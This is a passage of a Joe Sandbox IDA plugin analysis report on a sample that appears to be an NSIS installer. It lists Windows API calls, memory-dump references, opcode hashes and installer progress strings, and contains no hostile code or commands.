                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
